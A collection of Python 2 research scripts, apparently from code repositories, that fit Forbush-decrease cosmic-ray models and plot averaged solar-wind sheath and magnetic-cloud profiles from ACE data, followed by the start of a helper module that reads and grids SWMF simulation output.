dir_inp_mc = '{dir}/icmes/ascii/MCflag0.1.2.2H/woShiftCorr/_auger_' .format(dir=env['MEAN_PROFILES_ACE'])
#dir_inp_sh = '{dir}/sheaths/ascii/MCflag2/wShiftCorr/_test_Vmc_' .format(dir=env['MEAN_PROFILES_ACE'])
#dir_inp_mc = '{dir}/mcs/ascii/MCflag2/wShiftCorr/_test_Vmc_' .format(dir=env['MEAN_PROFILES_ACE'])
fname_inp_part = 'MCflag0.1.2.2H_2before.4after_fgap0.2_WangNaN' # '_vlo.100.0.vhi.375.0_CRs.Auger_BandScals.txt'
#fname_inp_part = 'MCflag2_2before.4after_fgap0.2_Wang90.0'
#CRstr = 'CRs.Auger_BandScals'
#CRstr = 'CRs.Auger_BandMuons'
CRstr = 'CRs.Auger_scals'
mgr = fd.mgr_data(dir_inp_sh, dir_inp_mc, fname_inp_part)
#sh, mc, cr = mgr.run(vlo=100.0, vhi=375.0, CRstr=CRstr)
#sh, mc, cr = mgr.run(vlo=375.0, vhi=450.0, CRstr=CRstr)
sh, mc, cr = mgr.run(vlo=450.0, vhi=3000.0, CRstr=CRstr)
fname_fig = './_nCR_vlo.{lo:4.1f}.vhi.{hi:4.1f}_{name}.png' .format(lo=mgr.vlo, hi=mgr.vhi, name=CRstr)
fname_out = './_nCR_vlo.{lo:5.1f}.vhi.{hi:4.1f}_{name}.h5' .format(lo=mgr.vlo, hi=mgr.vhi, name=CRstr)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#-- mc:
mc.cc = (mc.t>0.0) & (mc.t<=2.0)
mc.tout = 3.0*mc.t[mc.cc]+1.0
mc.rms = mc.rmsB[mc.cc]
mc.B = mc.B[mc.cc]
cr.mc.crs = cr.mc.avr[mc.cc]
#-- sheath
sh.cc = sh.t<1.0
sh.tout = sh.t[sh.cc]
sh.rms = sh.rmsB[sh.cc]
sh.B = sh.B[sh.cc]
cr.sh.crs = cr.sh.avr[sh.cc]
tpre = 0.0 #-1.0 # tiempo antes del cual se toma data para el rms-del-quiet-SW
rms_o = np.mean(sh.rms[sh.t<tpre]) #0.06 #0.025 #np.mean(sh.rms[sh.t<-1.0]) #0.03
t = np.concatenate([sh.tout, mc.tout])
rms = np.concatenate([sh.rms, mc.rms])
B = np.concatenate([sh.B, mc.B])
crs = np.concatenate([cr.sh.crs, cr.mc.crs])
org_t = t.copy()
org_crs = crs.copy()
t, rms, crs, B = t[t>=0.0], rms[t>=0.0], crs[t>=0.0], B[t>=0.0]
dt = t[1:-1] - t[0:-2]
cte = 0.0
#--- 'fc' es la version trozos de 'rms'
cc = ((rms-rms_o)>=0.0) & (t<5.0)
fc = np.zeros(rms.size)
fc[cc] = (rms-rms_o)[cc]
b = B
#++++++++++++++++++++++++++++++++++++++++++++++++ ajuste
#--- semillas
tau_, q_, off_ = 5., -6., 0.1 #2.0, -400.0
bp_, bo_ = -0.1, 10.0
#--- parameter boundaries && number of evaluations
nbin = 20 #5
tau = Lim(0.2, 10., n=nbin)
q = Lim(-20., -0.1, n=nbin)
off = Lim(0., 1., n=nbin)
bp = Lim(-1., 0., n=nbin)
bo = Lim(0., 20., n=nbin)
#--- slice object
rranges = (
slice(tau.min, tau.max, tau.delta()),
slice(q.min, q.max, q.delta()),
slice(off.min, off.max, off.delta()),
slice(bp.min, bp.max, bp.delta()),
slice(bo.min, bo.max, bo.delta()),
)
#--- start && run the fitter
data = np.array([t, fc, crs, b])
fit = ff.fit_forbush(data, [tau_, q_, off_, bp_, bo_])
#fit.make_fit_brute(rranges)
#print fit.par
fit.par = {}
#--- output en hdf5
fo = h5(fname_out, 'r')
for pname in fo.keys():
if pname=='grids':
continue
fit.par[pname] = fo[pname].value
#fo[pname] = fit.par[pname]
print fit.par
#--- guardamos la grilla de exploracion
#fo['grids/tau'] = [tau.min, tau.max, tau.delta(), tau.n]
#fo['grids/q'] = [q.min, q.max, q.delta(), q.n]
#fo['grids/off'] = [off.min, off.max, off.delta(), off.n]
#fo['grids/bp'] = [bp.min, bp.max, bp.delta(), bp.n]
#fo['grids/bo'] = [bo.min, bo.max, bo.delta(), bo.n]
#------------------
#++++++++++++++++++++++++++++++++++++++++++++++++ figura
fig = figure(1, figsize=(6,3.))
ax = fig.add_subplot(111)
ncr = ff.nCR2([t, fc, b], **fit.par)
sqr = np.nanmean(np.square(crs - ncr))
#--- plot izq
ax.plot(org_t, org_crs, '-o', c='gray', ms=3)
ax.plot(t, ncr, '-', c='red', lw=5, alpha=0.8, label='$\\{tau:3.3g}$'.format(**fit.par))
#++++ region sheath (naranja)
trans = transforms.blended_transform_factory(ax.transData, ax.transAxes)
rect1 = patches.Rectangle((0., 0.), width=1, height=1,
transform=trans, color='orange',
alpha=0.3)
ax.add_patch(rect1)
#++++ region mc (blue)
trans = transforms.blended_transform_factory(ax.transData, ax.transAxes)
rect1 = patches.Rectangle((1., 0.), width=3, height=1,
transform=trans, color='blue',
alpha=0.3)
ax.add_patch(rect1)
ax.plot(t, crs, '-o', c='k', ms=3)
#ax.axhline(y=0.0, c='g')
ax.grid()
ax.set_xlabel('time normalized to sheath/MC passage [1]', fontsize=14)
ax.set_ylabel('$n_{CR}$ [%]', fontsize=21)
ax.set_ylim(-1., 0.5)
savefig(fname_fig, dpi=135, bbox_inches='tight')
print " ---> generamos: " + fname_fig
close()
#EOF
```
#### File: n_CR/Vmc_lo/load_Vsw.py
```python
import numpy as np
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
class gral():
def __init__(self):
self.name = ''
sh, mc = gral(), gral()
cr = gral()
cr.sh, cr.mc = gral(), gral()
vlo, vhi = 550.0, 3000.0 #550., 3000. #100.0, 450.0 #550.0, 3000.0
dir_inp_sh = '../../../sheaths/ascii/MCflag2/wShiftCorr/_test_Vmc_'
dir_inp_mc = '../../../mcs/ascii/MCflag2/wShiftCorr/_test_Vmc_'
fname_inp_part = 'MCflag2_2before.4after_fgap0.2_Wang90.0_vlo.%4.1f.vhi.%4.1f' % (vlo, vhi)
fname_sh = dir_inp_sh + '/%s_V.txt' % fname_inp_part
fname_mc = dir_inp_mc + '/%s_V.txt' % fname_inp_part
sh.data = np.loadtxt(fname_sh).T
mc.data = np.loadtxt(fname_mc).T
sh.t, sh.avr = sh.data[0], sh.data[2]
mc.t, mc.avr = mc.data[0], mc.data[2]
#++++++++++++++++++++++++++++++++++++++++++++++++++++
fname_sh = dir_inp_sh + '/%s_CRs.txt' % fname_inp_part
fname_mc = dir_inp_mc + '/%s_CRs.txt' % fname_inp_part
cr.sh.data = np.loadtxt(fname_sh).T
cr.mc.data = np.loadtxt(fname_mc).T
cr.sh.t, cr.sh.avr = cr.sh.data[0], cr.sh.data[2]
cr.mc.t, cr.mc.avr = cr.mc.data[0], cr.mc.data[2]
```
#### File: mcs/src/bonitos.py
```python
import os
from rebineo import *
import matplotlib.patches as patches
import matplotlib.transforms as transforms
import console_colors as ccl
def makefig(medVAR, avrVAR, stdVAR, nVAR, tnorm,
dTday, SUBTITLE, YLIMS, YLAB, fname_fig, varname):
fig = figure(1, figsize=(13, 6))
ax = fig.add_subplot(111)
if varname=='Temp':
avrVAR *= 1e-4
medVAR *= 1e-4
stdVAR *= 1e-4
YLIMS[0] *= 1e-4
YLIMS[1] *= 1e-4
YLAB += ' $\\times$ 10$^4$'
ax.plot(tnorm, avrVAR, 'o-', c='black', markersize=5, label='mean')
ax.plot(tnorm, medVAR, 'o-', c='red', alpha=.8, markersize=5, markeredgecolor='none', label='median')
inf = avrVAR + stdVAR/sqrt(nVAR)
sup = avrVAR - stdVAR/sqrt(nVAR)
ax.fill_between(tnorm, inf, sup, facecolor='gray', alpha=0.5)
trans = transforms.blended_transform_factory(
ax.transData, ax.transAxes)
rect1 = patches.Rectangle((0., 0.), width=1.0, height=1,
transform=trans, color='blue',
alpha=0.3)
ax.add_patch(rect1)
if ylabel=='$\\beta$ [1]':
ax.set_yscale('log')
else:
ax.set_yscale('linear')
ax.legend(loc='upper right', fontsize=20)
ax.grid()
ax.set_ylim(YLIMS)
TITLE = SUBTITLE;
LABSIZE = 22
ax.set_title(TITLE, fontsize=25)
ax.set_xlabel('time normalized to MC passage time [1]', fontsize=LABSIZE)
ax.set_ylabel(YLAB, fontsize=LABSIZE)
ax.tick_params(labelsize=20)
savefig(fname_fig, format='png', dpi=180, bbox_inches='tight')
close()
def wangflag(ThetaThres):
if ThetaThres<0:
return 'NaN'
else:
return str(ThetaThres)
#-------------------- para figuras:
Nsh = dVARS[0][0]
WangFlag = 'NaN'#wangflag(ThetaThres)
# prefijo gral para los nombres de los graficos:
if CorrShift:
prexShift = 'wShiftCorr'
else:
prexShift = 'woShiftCorr'
DIR_FIGS = '../plots/MCflag%s/%s/bonito' % (MCwant['alias'], prexShift)
DIR_ASCII = '../ascii/MCflag%s/%s/bonito' % (MCwant['alias'], prexShift)
try:
os.system('mkdir -p %s' % DIR_FIGS)
os.system('mkdir -p %s' % DIR_ASCII)
print ccl.On + " -------> creando: %s" % DIR_FIGS + ccl.W
print ccl.On + " -------> creando: %s" % DIR_ASCII + ccl.W
except:
print ccl.On + " Ya existe: %s" %DIR_FIGS + ccl.W
print ccl.On + " Ya existe: %s" %DIR_ASCII + ccl.W
FNAMEs = 'MCflag%s_%dbefore.%dafter_Wang%s_fgap%1.1f' % (MCwant['alias'], nbefore, nafter, WangFlag, fgap)
FNAME_ASCII = '%s/%s' % (DIR_ASCII, FNAMEs)
FNAME_FIGS = '%s/%s' % (DIR_FIGS, FNAMEs)
#----------------------------------------------------------------------------------------------------
for i in range(nvars):
fname_fig = '%s_%s.png' % (FNAME_FIGS, VARS[i][1])
print ccl.Rn+ " ------> %s" % fname_fig
varname = VARS[i][1]
ylims = VARS[i][2]
ylabel = VARS[i][3]
mediana = dVARS[i][4]
average = dVARS[i][3]
std_err = dVARS[i][5]
nValues = dVARS[i][6] # nmbr of good values aporting data
binsPerTimeUnit = nbin/(1+nbefore+nafter)
SUBTITLE = '# events with >80%% of data: %d' % (nEnough[i])
makefig(mediana, average, std_err, nValues, tnorm,
dTday, SUBTITLE, ylims, ylabel, fname_fig, varname)
fdataout = '%s_%s.txt' % (FNAME_ASCII, varname)
dataout = array([tnorm, mediana, average, std_err, nValues])
print " ------> %s\n" % fdataout + ccl.W
savetxt(fdataout, dataout.T, fmt='%12.5f')
##
```
#### File: sheaths.paper/src/together2_global.py
```python
from pylab import *
import numpy as np
import console_colors as ccl
from scipy.io.netcdf import netcdf_file
import os, sys
import matplotlib.patches as patches
import matplotlib.transforms as transforms
from numpy import array
from matplotlib.gridspec import GridSpec
import matplotlib.pyplot as plt
class gral:
def __init__(self):
self.name='name'
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
def makefig(ax, mc, sh, TEXT, TEXT_LOC, YLIMS, varname):
LW = 0.3 # linewidth
MS = 1.5
fmc,fsh = 3.0, 1.0 # escaleos temporales
if(varname == 'Temp'):
mc.med /= 1.0e4; sh.med /= 1.0e4
mc.avr /= 1.0e4; sh.avr /= 1.0e4
mc.std_err /= 1.0e4; sh.std_err /= 1.0e4
YLIMS[0] /= 1.0e4; YLIMS[1] /= 1.0e4
TEXT_LOC['mc'][1] /= 1.0e4
TEXT_LOC['sh'][1] /= 1.0e4
# curvas del mc
time = fsh+fmc*mc.tnorm
cc = time>=fsh
ax.plot(time[cc], mc.avr[cc], 'o-', color='black', markersize=MS, label='mean', lw=LW)
ax.plot(time[cc], mc.med[cc], 'o-', color='red', alpha=.8, markersize=MS, markeredgecolor='none', label='median', lw=LW)
# sombra del mc
inf = mc.avr + mc.std_err/np.sqrt(mc.nValues)
sup = mc.avr - mc.std_err/np.sqrt(mc.nValues)
ax.fill_between(time[cc], inf[cc], sup[cc], facecolor='gray', alpha=0.5)
trans = transforms.blended_transform_factory(
ax.transData, ax.transAxes)
rect1 = patches.Rectangle((fsh, 0.), width=fmc, height=1,
transform=trans, color='blue',
alpha=0.3)
ax.add_patch(rect1)
# curvas del sheath
time = fsh*sh.tnorm
cc = time<=fsh
ax.plot(time[cc], sh.avr[cc], 'o-', color='black', markersize=MS, lw=LW)
ax.plot(time[cc], sh.med[cc], 'o-', color='red', alpha=.8, markersize=MS, markeredgecolor='none', lw=LW)
# sombra del sheath
inf = sh.avr + sh.std_err/np.sqrt(sh.nValues)
sup = sh.avr - sh.std_err/np.sqrt(sh.nValues)
ax.fill_between(time[cc], inf[cc], sup[cc], facecolor='gray', alpha=0.5)
#trans = transforms.blended_transform_factory(
# ax.transData, ax.transAxes)
rect1 = patches.Rectangle((0., 0.), width=fsh, height=1,
transform=trans, color='orange',
alpha=0.3)
ax.add_patch(rect1)
#ax.legend(loc='best', fontsize=10)
ax.tick_params(labelsize=10)
ax.grid()
ax.set_xlim(-2.0, 7.0)
ax.set_ylim(YLIMS)
ax.text(TEXT_LOC['mc'][0], TEXT_LOC['mc'][1], TEXT['mc'], fontsize=7.5)
ax.text(TEXT_LOC['sh'][0], TEXT_LOC['sh'][1], TEXT['sh'], fontsize=7.5)
if(varname in ('beta','Temp', 'rmsB', 'rmsBoB')):
ax.set_yscale('log')
else:
ax.set_yscale('linear')
return ax
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
stf = {}
stf['B'] = {
'label': 'B [nT]',
'ylims': [4., 17.],
'text_loc': {'mc':[4.5, 12.0], 'sh':[-1.95, 12.0]}
}
stf['V'] = {
'label': 'V [km/s]',
'ylims': [400., 580.],
'text_loc': {'mc':[4.5, 410.0], 'sh':[-1.95, 520.0]}
}
stf['rmsBoB'] = {
'label': 'rmsBoB [1]',
'ylims': [0.01, 0.2],
'text_loc': {'mc':[4.5, 0.020], 'sh':[-1.95, 0.02]}
}
stf['rmsB'] = {
'label': 'rmsB [nT]',
'ylims': [0.1, 2.0],
'text_loc': {'mc':[4.5, 0.8], 'sh':[-1.95, 1.0]},
}
stf['beta'] = {
'label': '$\\beta$ [1]',
'ylims': [0.1, 6.0],
'text_loc': {'mc':[4.5, 0.2], 'sh':[-1.95, 0.2]}
}
stf['Pcc'] = {
'label': '$n_p$ [$cm^{-3}$]',
'ylims': [2, 20],
'text_loc': {'mc':[4.5, 11], 'sh':[-1.95, 14.0]}
}
stf['Temp'] = {
'label': 'Tp ($\\times 10^4$) [K]',
'ylims': [1e4, 33e4],
'text_loc': {'mc':[4.5, 2.0e4], 'sh':[-1.95, 20.0e4]}
}
stf['AlphaRatio'] = {
'label': 'alpha ratio [1]',
'ylims': [0.02, 0.09],
'text_loc': {'mc':[4.5, 0.022], 'sh':[-1.95, 0.07]}
}
stf['CRs'] = {
'label': '$n_{GCR}$ [%]',
'ylims': [-5.0, 1.0],
'text_loc': {'mc':[4.5, -4.0], 'sh':[-1.95, -2.5]}
}
#dir_figs = '../figs'
#dir_inp_mc = '../../../../mcs/ascii/MCflag2/wShiftCorr/_test_Vmc_'
#dir_inp_sh = '../../../../sheaths/ascii/MCflag2/wShiftCorr/_test_Vmc_'
dir_figs = sys.argv[1]
dir_inp_sh = os.environ['LEFT']
dir_inp_mc = os.environ['RIGHT']
fname_fig = '%s/figs_all.global.png' % dir_figs
#vlo = [100.0, 450.0, 550.0]
#vhi = [450.0, 550.0, 3000.0]
#nvars = len(stf.keys())
print " input: "
print " %s " % dir_inp_mc
print " %s \n" % dir_inp_sh
#print " vlo, vhi: ", (vlo, vhi), '\n'
#print " nvars: ", nvars
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
i=2
#fig = figure(1, figsize=(12, 15))
f = plt.figure(1, figsize=(8, 9))
#nr = 1 # scale for row size
gs = GridSpec(nrows=4, ncols=2)
gs.update(left=0.1, right=0.98, hspace=0.13, wspace=0.25)
fname_inp = 'MCflag2_2before.4after_fgap0.2_Wang90.0'
fname_inp_nro_mc = dir_inp_mc + '/n.events_' + fname_inp + '.txt'
fname_inp_nro_sh = dir_inp_sh + '/n.events_' + fname_inp + '.txt'
VARNAMEs = ['B', 'V', 'Pcc', 'Temp', 'beta', 'rmsBoB', 'CRs', 'rmsB']
nvars = len(VARNAMEs)
for i, varname in zip(range(nvars), VARNAMEs):
TEXT = {}
fnro_mc = open(fname_inp_nro_mc, 'r')
fnro_sh = open(fname_inp_nro_sh, 'r')
for lmc, lsh in zip(fnro_mc, fnro_sh):
l_mc = lmc.split()
l_sh = lsh.split()
if varname==l_mc[0]: # nombre de la variable
fnro_mc.close(); fnro_sh.close()
break
nr = int(1.*i/2) # row
nc = i%2 # column
ax = plt.subplot(gs[nr, nc])
# Nfinal: events w/80%% of data (ESTE ME INTERESA!)
Nfinal_mc, Nfinal_sh = int(l_mc[1]), int(l_sh[1])
print " (row, col)=(%d, %d) ---> " % (nr, nc),
print " %s"%varname, ' Nfinal_mc:%d' % Nfinal_mc, 'Nfinal_sh:%d' % Nfinal_sh
mc, sh = gral(), gral()
fname_inp_mc = dir_inp_mc + '/' + fname_inp + '_%s.txt' % varname
fname_inp_sh = dir_inp_sh + '/' + fname_inp + '_%s.txt' % varname
mc.tnorm, mc.med, mc.avr, mc.std_err, mc.nValues = np.loadtxt(fname_inp_mc).T
sh.tnorm, sh.med, sh.avr, sh.std_err, sh.nValues = np.loadtxt(fname_inp_sh).T
# nro de datos con mas del 80% non-gap data
TEXT['mc'] = 'events: %d' % Nfinal_mc
TEXT['sh'] = 'events: %d' % Nfinal_sh
TEXT_LOC = stf[varname]['text_loc'] #1.7, 12.0
ylims = stf[varname]['ylims'] #[4., 17.]
ylabel = stf[varname]['label'] #'B [nT]'
makefig(ax, mc, sh, TEXT, TEXT_LOC, ylims, varname)
# labels
ax.set_ylabel(ylabel, fontsize=12)
if nr==3:
ax.set_xlabel('time normalized to\nsheath/MC passage [1]', fontsize=11)
else:
ax.set_xlabel('')
ax.xaxis.set_ticklabels([])
#fig.tight_layout()
savefig(fname_fig, dpi=150, bbox_inches='tight')
close()
print "\n output en:\n %s\n" % fname_fig
#EOF
```
#### File: src/forbush/c_rebineo_forbush.py
```python
from pylab import *
from numpy import *
from scipy.io.netcdf import netcdf_file
from datetime import datetime, time, timedelta
#------------ shared libraries:
import sys
sys.path.append('../../shared_lib')
from shared_funcs import * #c_funcs import *
#------------------------------
#from read_NewTable import tshck, tini_icme, tend_icme, tini_mc, tend_mc, n_icmes, MCsig
from ShiftTimes import *
import numpy as np
from z_expansion_gulisano import z as z_exp
import console_colors as ccl
import read_NewTable as tb
#---- cosas input
day = 86400.
fnames = {}
fnames['ACE'] = '../../../../../../../data_ace/64sec_mag-swepam/ace.1998-2014.nc'
fnames['table_richardson'] = '../../../../data_317events_iii.nc'
#---- directorios de salida
dirs = {}
dirs['dir_plots'] = '../plots'
dirs['dir_ascii'] = '../ascii'
#-------------------------------------------------------------
#------- seleccionamos MCs con label-de-catalogo (lepping=2, etc)
#MCwant = {'flags': ('0', '1', '2', '2H'),
# 'alias': '0.1.2.2H'} # para "flagear" el nombre/ruta de las figuras
#MCwant = {'flags': ('1', '2', '2H'),
# 'alias': '1.2.2H'} # para "flagear" el nombre/ruta de las figuras
#MCwant = {'flags': ('2', '2H'),
# 'alias': '2.2H'} # para "flagear" el nombre/ruta de las figuras
MCwant = {'flags': ('2',),
'alias': '2'} # para "flagear" el nombre/ruta de las figuras
FILTER = {}
FILTER['Mcmultiple'] = False # True para incluir eventos multi-MC
FILTER['wang'] = True
FILTER['vsw_filter'] = True
FILTER['z_filter_on'] = False
FILTER['CorrShift'] = True
FILTER['MCwant'] = MCwant
CUTS = {}
CUTS['ThetaThres'] = 90.0
CUTS['dTday'] = 0.0
CUTS['v_lo'] = 550.0
CUTS['v_hi'] = 3000.0
CUTS['z_lo'] = -50.0
CUTS['z_hi'] = 0.65
nBin = {}
nBin['before'] = 2
nBin['after'] = 4
nBin['bins_per_utime'] = 50 # bins por unidad de tiempo
nBin['total'] = (1+nBin['before']+nBin['after'])*nBin['bins_per_utime']
fgap = 0.2
class boundaries:
def __init__(self):
name = 'name'
bounds = boundaries()
bounds.tini = tb.tshck #tb.tini_mc #tb.tshck
bounds.tend = tb.tini_mc #tb.tend_mc #tb.tini_mc
FILTER['vsw_filter'] = False
CUTS['v_lo'], CUTS['v_hi'] = 550.0, 3000.0
emgr = events_mgr(dirs, fnames, FILTER, CUTS, bounds, nBin, fgap, tb, z_exp)
emgr.run_all()
FILTER['vsw_filter'] = True
CUTS['v_lo'], CUTS['v_hi'] = 100.0, 450.0
emgr = events_mgr(dirs, fnames, FILTER, CUTS, bounds, nBin, fgap, tb, z_exp)
emgr.run_all()
FILTER['vsw_filter'] = True
CUTS['v_lo'], CUTS['v_hi'] = 450.0, 550.0
emgr = events_mgr(dirs, fnames, FILTER, CUTS, bounds, nBin, fgap, tb, z_exp)
emgr.run_all()
FILTER['vsw_filter'] = True
CUTS['v_lo'], CUTS['v_hi'] = 550.0, 3000.0
emgr = events_mgr(dirs, fnames, FILTER, CUTS, bounds, nBin, fgap, tb, z_exp)
emgr.run_all()
##
``` |
{
"source": "jimsrc/swmf_figs",
"score": 2
} |
#### File: swmf_figs/shared/funcs.py
```python
import numpy as np
#from numpy import sin, cos, array, sqrt
import logging, argparse, glob
import h5py, copy
#---- system
from subprocess import Popen, PIPE, STDOUT
import re
#---- graphics
from pylab import figure, close, show
from matplotlib import cm
from matplotlib.colors import LogNorm, Normalize
from mpl_toolkits.mplot3d import Axes3D # necessary for projection='3d' in add_subplot()
#---- polar plots (w/ partial limits)
import mpl_toolkits.axisartist.floating_axes as floating_axes
import mpl_toolkits.axisartist.angle_helper as angle_helper
from matplotlib.projections import PolarAxes
from mpl_toolkits.axisartist.grid_finder import (FixedLocator, MaxNLocator,
DictFormatter)
import Tkinter
#++++++ constants
r2d = 180./np.pi
np.set_printoptions(precision=2, linewidth=230)
#++++++ logging
logger = logging.getLogger()
logger.setLevel(logging.DEBUG) # 'DEBUG' by default
ch = logging.StreamHandler()
# logging setup
formatter = logging.Formatter("# %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
def equi_list(flist, npart):
"""
returns most equi-partitioned tuple of lists
of days between date-objects 'dini' and 'dend'
"""
nf = len(flist)
nf_part = np.zeros(npart, dtype=np.int)
resid = np.mod(nf, npart)
for i in range(npart-resid):
nf_part[i] = nf/npart
# last positions where I put residuals
last = np.arange(start=-1,stop=-resid-1,step=-1)
for i in last:
nf_part[i] = nf/npart + 1
assert np.sum(nf_part)==nf, \
" --> somethng went wrong! :/ "
return nf_part
def equi_days(dini, dend, n):
"""
returns most equi-partitioned tuple of number
of days between date-objects 'dini' and 'dend'
"""
days = (dend - dini).days
days_part = np.zeros(n, dtype=np.int)
resid = np.mod(days, n)
for i in range(n-resid):
days_part[i] = days/n
# last positions where I put residuals
last = np.arange(start=-1,stop=-resid-1,step=-1)
for i in last:
days_part[i] = days/n+1
assert np.sum(days_part)==days, \
" --> somethng went wrong! :/ "
return days_part
#+++++++++++++++++++++++++++++++++++
def calc_phi(_x, _y):
assert (_x!=0) or (_y!=0.), "\n [-] singularity!\n"
if ((_x==0.) & (_y>0.)):
return 0.5*np.pi
elif ((_x==0.) & (_y<0.)):
return 1.5*np.pi
elif (_x<0.):
return np.pi + np.arctan(_y/_x)
elif ((_x>0.) & (_y<0.)):
return 2.*np.pi + np.arctan(_y/_x)
else:
return np.arctan(_y/_x)
#@profile
def read_data(fnm, vnames):
"""
fnm : input filename
vnames : variable names
odata : output data (processed from ASCII data)
"""
print "\n [+] reading data...\n"
fformat = file_format(fnm)
vdict = {}
if fformat=='ascii':
inp = np.loadtxt(fnm, unpack=True, skiprows=5)
# make sure we match the number of fields in the ASCII file
assert len(inp)==(3 + len(vnames)), \
'\n [-] vnames doesn\'t match the number of fields in the ASCII file!\n'
# get the coordinates
x, y, z = inp[:3]
# get output variables from simulation
for nm, _inm in zip(vnames, range(len(vnames))):
vdict[nm] = inp[3+_inm]
print ' [*] read ok.\n'
ndata = x.size
r, th, ph = np.zeros((3,ndata), dtype=np.float)
r[:] = np.sqrt(x**2 + y**2 + z**2)
th[:] = np.arctan(z / np.sqrt(x**2 + y**2))
for i in range(ndata):
#r[i] = np.sqrt(x[i]**2 + y[i]**2 + z[i]**2)
#th[i] = np.arctan(z[i]/)
ph[i] = calc_phi(x[i], y[i]) # [rad]
elif fformat=='hdf5':
logger.info(' [*] reading an HDF5 file...')
f5 = h5py.File(fnm, 'r')
r = f5['coords/r'][...]
ph = f5['coords/ph'][...]
th = f5['coords/th'][...]
for nm in f5['data'].keys():
# don't read variables that we did not ask for.
if nm not in vnames: pass
assert nm not in vdict.keys(),\
'\n [-] vdict already has the key! (%s)\n' % nm
logger.debug(' [*] reading variable: '+nm)
vdict[nm] = f5['data/'+nm][...]
assert len(vdict.keys()) > 0,\
' [-] we did not grab any variable from:\n %r\n by using the parsed list:\n %r\n'% (f5.keys(), vnames)
f5.close()
elif fformat=='binary': # IDL binary
import spacepy.pybats as pb
# NOTE: SpacePy knows how to handle IDL binary!
fpb = pb.IdlFile(fnm, format=fformat)
# get coordinates
x, y, z = fpb['x'][...], fpb['y'][...], fpb['z'][...]
# get output variables from simulation
#fkeys_low = [ _k.lower() for _k in fpb.keys() ]
assert all([_vnm in fpb.keys() for _vnm in vnames]), \
"""
one of these variables:
%r
is/are not included in those of the input file:
%r
""" % (vnames, fpb.keys())
for nm in vnames:
vdict[nm] = fpb[nm][...]
print ' [*] read ok.\n'
ndata = x.size
r, th, ph = np.zeros((3,ndata), dtype=np.float)
r[:] = np.sqrt(x**2 + y**2 + z**2)
th[:] = np.arctan(z / np.sqrt(x**2 + y**2))
ph[:] = [ calc_phi(x[i], y[i]) for i in range(ndata) ]
assert len(vdict.keys()) > 0,\
' [-] we did not grab any variable from:\n %r\n by using the parsed list:\n %r\n'% (fpb.keys(), vnames)
# TODO: need to close 'fpb'?
del fpb
else:
raise SystemExit('\n [-] wrong file format: %r\n'%fformat)
return r, ph, th, vdict, fformat
def ib_to_ind(ic, ib, coords, nRoot, nc, nLevel):
ic_r, ic_ph, ic_th = ic
r, ph, th = coords
nc_r, nc_ph, nc_th = nc
nRootX, nRootY, nRootZ = nRoot
npart_D = 2**nLevel # number of bi-partitions in EACH DIMENSION
nb_r = npart_D*nRootX
nb_ph = npart_D*nRootY
nb_th = npart_D*nRootZ
_ibloc = deduce_terna(ib, nRoot, nc, nLevel)
# location of the sub-block
ib_mem_r,ib_mem_ph,ib_mem_th = _ibloc['ib_mem']
# local location in units of sub-blocks
ibb_r, ibb_ph, ibb_th = _ibloc['ibb']
# global location in units of sub-blocks
ib_r = ib_mem_r *npart_D + ibb_r
ib_ph = ib_mem_ph*npart_D + ibb_ph
ib_th = ib_mem_th*npart_D + ibb_th
# global cardinal index
ind = ic_r + ic_ph*nc_r + ic_th*(nc_r*nc_ph) +\
ib*(nc_r*nc_th*nc_ph)
ind_r = ic_r + ib_r *nc_r
ind_ph = ic_ph + ib_ph*nc_ph
ind_th = ic_th + ib_th*nc_th
# info on screen
print " block:%d/%d, %d/%d, %d/%d " %\
(ib_r, nb_r, \
ib_ph, nb_ph, \
ib_th, nb_th),
#if ib_th >= 6:
# import pdb; pdb.set_trace()
print '; cell:%d,%d,%d; ind:%06d (%d,%d,%d)' % \
(ic_r, ic_ph, ic_th, ind, ind_r, ind_ph, ind_th),
print '; (r,ph,th)=(%.2f, %.2f, %.2f)' % \
(r[ind], ph[ind]*r2d, th[ind]*r2d)
# check mem block indexes
assert ib_mem_r < nRootX
assert ib_mem_ph < nRootY
assert ib_mem_th < nRootZ
# check sub-block indexes
assert ibb_r < npart_D
assert ibb_ph < npart_D
assert ibb_th < npart_D
# check final indexes
assert ind_r < nc_r * (nRootX*npart_D)
assert ind_ph < nc_ph * (nRootY*npart_D)
assert ind_th < nc_th * (nRootZ*npart_D)
return ind, ind_r, ind_ph, ind_th
#@profile
def get_array_vars(fname_inp=None, data=None, checks=False, complete_domain_walk=False, vnames=[], data_processor=None, vdict=None, vectorial=False):
"""
- read data from the ASCII file w/o assuming that it is consistent
w/ a complete grid-structure of cells and children-blocks
- We just produce one SCALAR observable determined by the
function 'data_processor()'.
"""
assert (fname_inp is not None) or (data is not None),\
' [-] ERROR: we need ASCII/HDF5 file or parsed data!\n'
if data is None:
# read_data() will handle the file format
r, ph, th, _vdict, fformat = read_data(fname_inp, vnames)
else:
r, ph, th, _vdict, fformat = data
if vdict is not None: vdict.update(_vdict)
ndata = r.size
# obtain Bmod from vdict
logger.info(' [+] processing input data to obtain observable...')
assert data_processor is not None, ' [-] We need a processor function!\n'
if fformat in ('ascii', 'binary'): # we need some treatment
# NOTE: in case vectorial==True, we need the transpose.
pdata = np.transpose(data_processor(_vdict))
if not(len(pdata.shape)==1 and not vectorial) and \
not(len(pdata.shape)>1 and vectorial):
raise SystemExit(' [-] parser conflict: observables is either scalar or vectorial.\n')
# make a full-domain discovery by walking all the
# entries (one by one) in the ASCII file.
eps = 0.005*0.05 #0.005 # tolerance for degeneration detection
logger.info(' [+] making domain discovery...')
_r, _ph, _th = get_domains([r,ph,th],
eps=eps, # precision for domain discovery
checks=checks,
complete=complete_domain_walk,
nc=None, nRoot=None, nLevel=None,
)
print('')
logger.info(' [+] domain is in the ranges: ')
logger.info(' r in (%g, %g) ' % ( _r.min(), _r.max()))
logger.info(' ph in (%g, %g) ' % (_ph.min(), _ph.max()))
logger.info(' th in (%g, %g) \n' % (_th.min(), _th.max()))
# allocate data buffer
if len(pdata.shape) == 1: # scalar
data = np.nan * np.ones((_r.size,_ph.size,_th.size), dtype=np.float32)
else: # vector
data = np.nan * np.ones((_r.size,_ph.size,_th.size, 3), dtype=np.float32)
logger.info(' [+] building 3D array...')
for ind in range(ndata):
# find the coordinate where it coincides with any
# of the (_r, _ph, _th)
i_r = (np.abs(_r - r[ind]) < eps).nonzero()[0][0]
